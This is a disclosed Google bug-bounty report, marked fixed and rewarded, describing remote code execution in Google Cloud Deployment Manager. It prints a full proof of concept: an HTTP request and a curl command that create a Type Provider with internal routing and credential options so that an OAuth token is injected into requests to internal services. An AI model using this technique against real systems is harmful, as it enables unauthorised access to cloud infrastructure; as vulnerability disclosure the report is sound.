other in Cloud DM

Reported by: Ezequiel Pereira

Google VRP

  • triaged

  • accepted

  • fixed

  • accepted

  • fixed

reward decided

$31,837

Summary: RCE in Google Cloud Deployment Manager

Create a Type Provider like this:

POST /deploymentmanager/staging_dogfood/projects/the-expanse/global/typeProviders HTTP/1.1
Host: www.googleapis.com
Authorization: Bearer <TOKEN>
Content-Type: application/json
Content-Length: 761

{
  "name": "hack",
  "descriptorUrl": "https://test-appengine.sandbox.googleapis.com/$discovery/rest?key=AIzaSyDrGwinQGYOyRu_QcMyYMEtsx3OMwoLuck",
  "options": {
    "inputMappings": [
      {
        "fieldName": "Authorization",
        "methodMatch": ".*",
        "value": "$.concat(\"Bearer \", $.googleOauth2AccessToken())",
        "pythonValue": "",
        "location": "HEADER"
      }
    ]
  },
  "googleOptions": {
    "gslbTarget": "blade:apphosting-admin-nightly",
    "descriptorUrlServerSpec": "blade:apphosting-admin-nightly",
    "injectProject": true,
    "ownershipKind": "GOOGLE",
    "credentialType": "GAIAMINT",
    "transport": "GSLB",
    "deleteIntent": "CREATE_OR_ACQUIRE",
    "isLocalProvider": false
  }
}
AUTH='Authorization: Bearer ';
DESCRIPTOR='http://example.com/any/path?and=param';

curl -XPOST   'https://www.googleapis.com/deploymentmanager/staging_dogfood/projects/sdcpocs/global/typeProviders?key=AIzaSyAa8yy0GdcGPHdtD083HiGGx_S0vMPScDM'   --header "$AUTH"   --header 'Accept: application/json'   --header 'Content-Type: application/json'   --data '{"name":"hack3","descriptorUrl":"'$DESCRIPTOR'","googleOptions":{"gslbTarget":"ANYGSLBTARGET","descriptorUrlServerSpec":"ANYGSLBTARGET","injectProject":true,"ownershipKind":"GOOGLE","credentialType":"GAIAMINT","transport":"GSLB","deleteIntent":"CREATE_OR_ACQUIRE","isLocalProvider":false}}'

Then you can read the response on the operation selfLink (but if you do a full target, you can also read any other response).